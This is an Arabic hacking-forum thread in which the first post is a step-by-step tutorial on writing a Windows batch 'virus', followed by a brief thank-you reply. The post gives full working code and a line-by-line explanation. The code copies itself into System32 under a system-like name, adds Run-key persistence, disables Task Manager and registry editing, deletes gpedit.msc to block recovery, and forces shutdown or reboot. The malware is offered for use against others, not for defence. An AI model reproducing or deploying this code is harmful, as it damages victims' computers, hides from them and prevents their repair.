التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قســم إختــراق الأجهــزة > قـسـم الفـايروسات Viruses

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-23-2011, 08:19 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Arthas
νвѕρι∂єяѕ кιηg
 
الصورة الرمزية Arthas
 

 

 
إحصائية العضو







Arthas غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Arthas is on a distinguished road

.... للمبتدئين والمتوسطين تفضلوا بالدخول


بسم الله الــرحمن الــرحيم


ملاحظة هامة جدا للاخوة: لرؤية الكتابات اللي باللغة الانكليزية بشكل صحيح اضغط left shift+left ctrl ببرنامج النوتباد
ثانيا : لواحق الملفات المستخدمة بالشرح هي exe مو بات لأننا راح نحول ملف البات الي exe
نبدأ اولا بشرح مهام الاوامر المستخدمة في الفايرس:
@echo off : وهو أمر مهم لكل ملف بات ومهمته منع اظهار الاوامر المنفذة على نافذة الدوز
If EXIST : وهو امر شرطي بمعنى اذا كان هذا الملف منشأ من قبل
GOTO : معناه اذهب اللى أو نفذ اجراء المعين
If Not EXIST : هو عكس الامر السابق
":shut و :Bull" : أسماء الاجراءات وهذي الاسماء اختيارية
reg add : لاضافة قيمة للريجستري
del: حذف ملف معين
shutdown -s -t 1 : ايقاف تشغيل الجهاز مباشرة
shutdown -r -t 1 : اعادة تشغيل الجهاز مباشرة
%windir% : وهو متغير هام جدا لمعرفة قرص النظام المعين الموجود فيه ملف WINDOWS
لاننا لو كتبنا مثلا : D:\windwos , بدلا من %windir% يمكن يكون قرص النظام هو F أو D وهيك راح يتعطل الفايرس
بعد ما شرحنا الاوامر المهمة وقبل ما أبدأ بالشرح الرئيسي بدي نوه أن هذا الفايرس محتاج أيضا لبعض التعديلات وما في شي كامل , ولكن هدف هذا الموضوع هو مساعدة الاخوة في كيفية التعامل مع الدوال الصعبة في الدوس وخاصة المتعلقة بالريجستري
أولا : طريقة عمل هذا الفايرس :
هذا الفايرس بيقوم بنسخ نفسه نسختان واحدة منهم للتمويه والتانية وهي ملف الفايرس الرئيسي واللي بيشتغل مع تشغيل النظام
وبيعمل شت داون , وحتى يشتغل مع الجهاز لازم نضيف قيمة للملف بالمفتاح RUN الموجود بالريجستري وهذا مساره:
HKLM\software\Microsoft\Windows\CurrentVersion\run
وأما بالنسبة للسيف مود فالملف ما راح يشتغل مع الجهاز وممكن اللي اصيب بالفايرس يدخل بكل بساطة من السيف مود وبعدين للريجستري ويحذف قيمة تشغيل الملف منه لهيك بيقوم الفايرس بتعطيل الريجستري , وال GRUOP POLICY ?
ال GRUOP POLICY هو برنامج يمكنكم الدخول له عن طريق الذهاب الى تشغيل واكتب : gpedit.msc حيث انه اذا كان
الشحص المصاب بالفايرس خبير شوي ممكن يفك تعطيل الريجستري عن طريقه, لهيك راح يقوم الفايرس بحذف ملف gpedit.msc
هيك صار تقريبا الفايرس شبه محمي يعني 78 % محمي وحله الوحيد الFORMAT
ثانيا : كتابة الكود:
انشأ ملف بات فارغ اسمه Blz وانسخ فيه الكود كاملا :
@echo off
if exist %windir%\System32\System111.exe goto shut
if NOT exist %windir%\System32\System111.exe goto Bull
:Bull
copy Blz.exe d:\3.exe
copy Blz.exe %windir%\System32\System111.exe
reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v BlzOfHK /t REG_SZ /d "d:\3.exe"
reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v System32 /t REG_SZ /d "d:\windows\System32\system111.exe"
reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableTaskMgr" /t REG_DWORD /d 0000001 /f
reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableRegistryTools" /t REG_DWORD /d 0000001 /f
del %windir%\system32\gpedit.msc
del Blz.exe
shutdown -r -t 1
shut:
shutdown -s -t 1
سبق وشرحنا مهمة الامر echo off , واما السطر التاني بالكود فبيقول :
اذا كان الملف system111.exe ( ملف الفايرس ) منشأ في مجلد system32 معناه الجهاز مصاب بالفايرس وما في حاجة لعملية نسخ نفسه و تكوين قيم التشغيل في الريسجتري " اذهب للإجراء Shut وهو اجراء ايقاف التشغيل
واما السطر الثالث فبيقول:
اذا لم يكن الملف system111.exe منشأ في مجلد system32 معناه انه لازم تقوم بعملية بناء الفايرس ونسخ نفسه للمجلد system32 وتكوين قيم الريجستري , وبتكون عملية بناء الفايرس على مراحل هي :
:BULL وهو اسم الاجراء
1) copy Blz.exe d:\3.exe
copy Blz.exe %windir%\System32\System111.exe
وهي نسخ ملف الفايرس ( اللي اسمه Blz) نسختان
2)reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v BlzOfHK /t REG_SZ /d "d:\3.exe"
انشاء قيمة في الرجستري بالمفتاح run ونوع هذي القيمة REG_SZ" يعني سلسلة واسمها BlzOfHK وبياناتها "d:\3.exe" أي مسار الملف المراد تشغيله
3)reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v System32 /t REG_SZ /d "d:\windows\System32\system111.exe"
نفس الامر السابق تماما لكن مع تغيير اسم القيمة لاسم متعلق بالنظام ( للخداع فقط) وبياناتها
4)reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableTaskMgr" /t REG_DWORD /d 0000001 /f
وهذا الامر هو لتعطيل ال TaskManger وفيه مسار القيمة وبعدين اسمها وهو : "DisableTaskMgr" ونوعها : REG_DWOR" أي قيمة ثنائية و بياناتها , بس لاحظوا آخر الكود السابق وهو /f وهو اختصار لكلمة force أي اجبار الريجستري على انشاء القيم دون التخيير بين نعم ولا وللتوضيح روح للدوز واكتب الكود السابق بدون /f تلاقي الدوس عطاك خياران yes أو No
5) reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableRegistryTools" /t REG_DWORD /d 0000001 /f
نفس الكود السابق تماما مع تغيير اسم القيمة فقط ومهمته تعطيل الريجستري
6)del %windir%\system32\gpedit.msc
لحذف ملف gpedit.msc
7)shutdown -r -t 4 : لاعادة التشغيل ولو تلاحظوا عطيناه 4 ثواني حتى يحذف الفايرس نفسه قبل اعادة التشغيل
8) del Blz.exe : لحذف ملف الفايرس بعد القيام بكل العمليات السابقة
واما الاجراء :shut فهو خارج العمليات السابقة أي مستقل عنها ومهمته ايقاف التشغيل
:ange::ange::ange::ange::ange::ange::ange::ange:



gglfj]zdk ,hglj,s'dk jtqg,h fhg]o,g

التوقيع

 

   

رد مع اقتباس
قديم 05-23-2011, 11:59 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية شيفرات
 

 

 
إحصائية العضو






شيفرات غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
شيفرات is on a distinguished road

افتراضي


مشكور على الشرح الوافي اخوي

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:36 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0